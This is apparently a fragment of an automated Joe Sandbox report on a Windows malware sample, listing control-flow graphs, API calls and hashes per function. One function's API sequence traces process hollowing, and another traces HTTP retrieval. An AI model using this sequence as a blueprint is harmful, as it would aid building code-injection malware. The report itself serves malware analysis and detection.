225->226 227 1c4210-1c421e 225->227 226->224 227->226 229 1c43e8 call 1db98e 227->229 235 1c43ed call 1db98e 229->235 239 1c43f2-1c43f7 call 1db98e 235->239 261 1c430c-1c4313 call 1d7335 257->261 262 1c42f8-1c4306 257->262 259 1c435c-1c4374 258->259 260 1c4330-1c433c 258->260 265 1c439e-1c43a4 259->265 266 1c4376-1c4382 259->266 263 1c433e-1c434c 260->263 264 1c4352-1c4359 call 1d7335 260->264 261->258 262->235 262->261 263->235 263->264 264->259 272 1c43ce-1c43e7 call 1d6cc2 265->272 273 1c43a6-1c43b2 265->273 270 1c4394-1c439b call 1d7335 266->270 271 1c4384-1c4392 266->271 270->265 271->235 271->270 277 1c43c4-1c43cb call 1d7335 273->277 278 1c43b4-1c43c2 273->278 277->272 278->239 278->277
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 001C4149
                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000,07E61CD7), ref: 001C41F4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CurrentDirectorySleep
                                                                                                                                                                                      • String ID: runas
                                                                                                                                                                                      • API String ID: 16921501-4000483414
                                                                                                                                                                                      • Opcode ID: cb5a854bdc249d2a566b6c1e49f090ef85d8201025dbc34f86a8e8f1057c0e83
                                                                                                                                                                                      • Instruction ID: 9f383d7ecb7619f2c3004e10acbcb966acbf1385db84ee42c0f05be8547f126a
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb5a854bdc249d2a566b6c1e49f090ef85d8201025dbc34f86a8e8f1057c0e83
                                                                                                                                                                                      • Instruction Fuzzy Hash: FFE16C71A04244ABDB18EB78CD96BADBB72EFA1304F50824DF4159B3C6DB35DA40C792
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 283 1e0707-1e071c GetEnvironmentStringsW 284 1e071e-1e073f call 1e06d0 call 1e0623 283->284 285 1e0777 283->285 284->285 293 1e0741-1e0742 call 1dd7ea 284->293 287 1e0779-1e077b 285->287 289 1e077d-1e077e FreeEnvironmentStringsW 287->289 290 1e0784-1e078a 287->290 289->290 295 1e0747-1e074c 293->295 296 1e074e-1e0764 call 1e0623 295->296 297 1e076c 295->297 296->297 302 1e0766-1e076a 296->302 299 1e076e-1e0775 call 1dd301 297->299 299->287 302->299
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 001E0710
                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001E077E
                                                                                                                                                                                        • Part of subcall function 001E0623: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,001E47F0,?,00000000,00000000), ref: 001E06C5
                                                                                                                                                                                        • Part of subcall function 001DD7EA: RtlAllocateHeap.NTDLL(00000000,?,?,?,001D7F22,?,?,?,?,?,001C20C3,?,?), ref: 001DD81C
                                                                                                                                                                                      • _free.LIBCMT ref: 001E076F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2560199156-0
                                                                                                                                                                                      • Opcode ID: 8d7fa0aac15099299341ade26ae744e8b98fc2eb0797f7832c0fd5e9b023582e
                                                                                                                                                                                      • Instruction ID: 25dc2077981beb49022bd4d9d2406a6daffa52614dbcd76b15e927d52d3878ac
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d7fa0aac15099299341ade26ae744e8b98fc2eb0797f7832c0fd5e9b023582e
                                                                                                                                                                                      • Instruction Fuzzy Hash: FE01A7B2E01AA17B272316B72CC9D7F796DCECEFD17190129F945D6200EBE19D8186B0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 001C9CCE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PathTemp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2920410445-0
                                                                                                                                                                                      • Opcode ID: 55a188228d94c217a519811aa519a4101fa2c9e9487d461f448d121e6fd92597
                                                                                                                                                                                      • Instruction ID: 1fa0c74c0ce0f6e2ff9e61cb8be9f4196b55140cac131a7494ccd3eb8a3ba901
                                                                                                                                                                                      • Opcode Fuzzy Hash: 55a188228d94c217a519811aa519a4101fa2c9e9487d461f448d121e6fd92597
                                                                                                                                                                                      • Instruction Fuzzy Hash: EA71C0B09042588BEB24DB24CD99BEDBB75AB51308F5041DCD20967282DB755FC8CFAA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 355 1dbf0d-1dbf14 356 1dbf19-1dbf20 call 1e0366 call 1e0707 355->356 357 1dbf16-1dbf18 355->357 361 1dbf25-1dbf29 356->361 362 1dbf2b-1dbf2e 361->362 363 1dbf30-1dbf39 call 1dbf60 361->363 364 1dbf54-1dbf5f call 1dd301 362->364 368 1dbf3b-1dbf3e 363->368 369 1dbf40-1dbf47 363->369 371 1dbf4c-1dbf53 call 1dd301 368->371 369->371 371->364
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                      • Opcode ID: 40a5a5e46a38bcc056119ee5cd8d64dcb4e035189f8ecd6a6d910643a1ff0017
                                                                                                                                                                                      • Instruction ID: c4d50456423396c0a4c79f468380f896bb26ed19a3e8a00497d22b531083e681
                                                                                                                                                                                      • Opcode Fuzzy Hash: 40a5a5e46a38bcc056119ee5cd8d64dcb4e035189f8ecd6a6d910643a1ff0017
                                                                                                                                                                                      • Instruction Fuzzy Hash: F9E0ED22A09860D1E226BB3ABC8137A1381ABD2374F23032BF425C67D4DF605882CC62
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 374 1dd15f-1dd185 call 1dcf35 377 1dd1de-1dd1e1 374->377 378 1dd187-1dd199 call 1e2341 374->378 380 1dd19e-1dd1a3 378->380 380->377 381 1dd1a5-1dd1dd 380->381
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                                                      • Opcode ID: 9dc63148765964deba9bbabc79461733a8418b0462751caa7c42f715166672c6
                                                                                                                                                                                      • Instruction ID: 3fcc4509da115980c5cbfd42c03129ebf8cea17ee34c6cfb3ee36962a8b7410c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dc63148765964deba9bbabc79461733a8418b0462751caa7c42f715166672c6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B111871A0410AAFCB05DF58E94199A7BF5EF48304F044099F809AB351D770E911CBA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 382 1e22d3-1e2307 call 1daa80 call 1da9e0 387 1e230e-1e2323 call 1e2361 382->387 388 1e2309-1e230c 382->388 391 1e2328-1e232b 387->391 389 1e232d-1e2331 388->389 392 1e233c-1e2340 389->392 393 1e2333-1e233b call 1dd301 389->393 391->389 393->392
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                      • Opcode ID: ba816259046d0be75618ad59585a9379a16cd9c489139ff9f294c9ae352ba751
                                                                                                                                                                                      • Instruction ID: 72d9b752fc4104bf1eb664c239493166e7158d1540e17af298d2b6759e8ed8e4
                                                                                                                                                                                      • Opcode Fuzzy Hash: ba816259046d0be75618ad59585a9379a16cd9c489139ff9f294c9ae352ba751
                                                                                                                                                                                      • Instruction Fuzzy Hash: 46014F72C00159BFCF01EFA98C019EE7FB9BF18310F144166FA14E2252E7358A20DB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 396 1dd7ea-1dd7f6 397 1dd828-1dd833 call 1db4a2 396->397 398 1dd7f8-1dd7fa 396->398 405 1dd835-1dd837 397->405 400 1dd7fc-1dd7fd 398->400 401 1dd813-1dd824 RtlAllocateHeap 398->401 400->401 402 1dd7ff-1dd806 call 1dc981 401->402 403 1dd826 401->403 402->397 408 1dd808-1dd811 call 1db9f9 402->408 403->405 408->397 408->401
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,001D7F22,?,?,?,?,?,001C20C3,?,?), ref: 001DD81C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                      • Opcode ID: 8ed1de15c712697bb5410ca8afa6cbd79cbb6a1f04cd175f7498503ce2f749b0
                                                                                                                                                                                      • Instruction ID: a512a3dfac062aa79254a097b5bea1be9bc4f05befa31ec8bfafd7553138ac84
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ed1de15c712697bb5410ca8afa6cbd79cbb6a1f04cd175f7498503ce2f749b0
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E0E5321441119ADA3226767C4075F7A9CEF513B0F060123EC0596390CF10DC00A1E1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 411 1e201a-1e203e CreateFileW
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,001E240A,?,?,00000000,?,001E240A,00000000,0000000C), ref: 001E2037
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                      • Opcode ID: 9a2aa30a026745a47532c0c918b5da70936a9615ad61a47f0c4a7e6509fb1452
                                                                                                                                                                                      • Instruction ID: c6b80f55d22498d9d6af11994e682280a7f372be0e46bf9be52d995b6abb97e7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a2aa30a026745a47532c0c918b5da70936a9615ad61a47f0c4a7e6509fb1452
                                                                                                                                                                                      • Instruction Fuzzy Hash: C0D06C3200014DBBDF028F84DD46EDA3FAAFB48714F014000BA1856020C732E861AB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 001C3776
                                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 001C37DB
                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 001C37F4
                                                                                                                                                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 001C380F
                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 001C3833
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 001C384E
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001C3855
                                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 001C387D
                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 001C389E
                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 001C38E2
                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 001C391E
                                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 001C393A
                                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,?,00000000), ref: 001C3946
                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 001C3954
                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001C3975
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                                                                      • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                      • API String ID: 4033543172-1522589568
                                                                                                                                                                                      • Opcode ID: 5a5713ae2c38d6278d62f501602022eac4063b61101e7427e387ebf81ed8fe2b
                                                                                                                                                                                      • Instruction ID: 648c6062be2e1cc637ecc21c8683b05142f7aab60d0b6f6dba03ca836e168a97
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a5713ae2c38d6278d62f501602022eac4063b61101e7427e387ebf81ed8fe2b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 15518F71A40218EFDB619F94DC85FEAB7B8FF08701F1040A5F609AA690D7B1AA94CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InternetOpenW.WININET(001F3F64,00000000,00000000,00000000,00000000), ref: 001C860C
                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 001C8630
                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,00000000), ref: 001C867A
                                                                                                                                                                                      • HttpSendRequestA.WININET(?,00000000), ref: 001C873A
                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 001C87EC
                                                                                                                                                                                      • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 001C88A0
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 001C88C7
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 001C88CF
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 001C88D7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                                                                                                                                      • String ID: w?RQ;
                                                                                                                                                                                      • API String ID: 1354133546-1165269761
                                                                                                                                                                                      • Opcode ID: 45b488ddd7e9295fe4e5610cc7cbaf116da0c8608c9147e15fbc667f26fa1a8d
                                                                                                                                                                                      • Instruction ID: c3124a746d23603fcd9ac9eb4d67075d20afe4681fbf9aa32e965123bbb97c34
                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b488ddd7e9295fe4e5610cc7cbaf116da0c8608c9147e15fbc667f26fa1a8d
                                                                                                                                                                                      • Instruction Fuzzy Hash: C7522471A001089BEB18DF68CC8ABEDBB76AF61304F54815DF805A73C2DB35DA84CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 597776487-0
                                                                                                                                                                                      • Opcode ID: d0175ee941f1bd601e4d40238e71b4ef56c96cf7cf9ded977b0a62367cef9f8f
                                                                                                                                                                                      • Instruction ID: 4939bb80ce0f941a66e5341f60d663fe3f611f2e4bde3e7a753a9006a27afdaf
                                                                                                                                                                                      • Opcode Fuzzy Hash: d0175ee941f1bd601e4d40238e71b4ef56c96cf7cf9ded977b0a62367cef9f8f
                                                                                                                                                                                      • Instruction Fuzzy Hash: B5C17B71A04A84AFCB24DF7ACC496BE7BA9EF95310F25406AE4A5D7281E7308F81C750
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetVersionExW.KERNEL32(0000011C,07E61CD7), ref: 001C447A
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001C44DB
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001C44E2
                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001C45A7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleInfoModuleProcSystemVersion
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1456109104-0
                                                                                                                                                                                      • Opcode ID: cb6a21a05ff8a2ed645a5b362fddc047872860ea381122dc2175c615cea442af
                                                                                                                                                                                      • Instruction ID: 8dccc52439669921b41cf1c37cb9b3a7dbc2e61125fd1f611abf4984913e590d
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb6a21a05ff8a2ed645a5b362fddc047872860ea381122dc2175c615cea442af
                                                                                                                                                                                      • Instruction Fuzzy Hash: A6122870A042149BEF18EB28CD66BADB772ABA6314F54419CE409973D1DB35DEC0CBD2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -
                                                                                                                                                                                      • API String ID: 0-2547889144
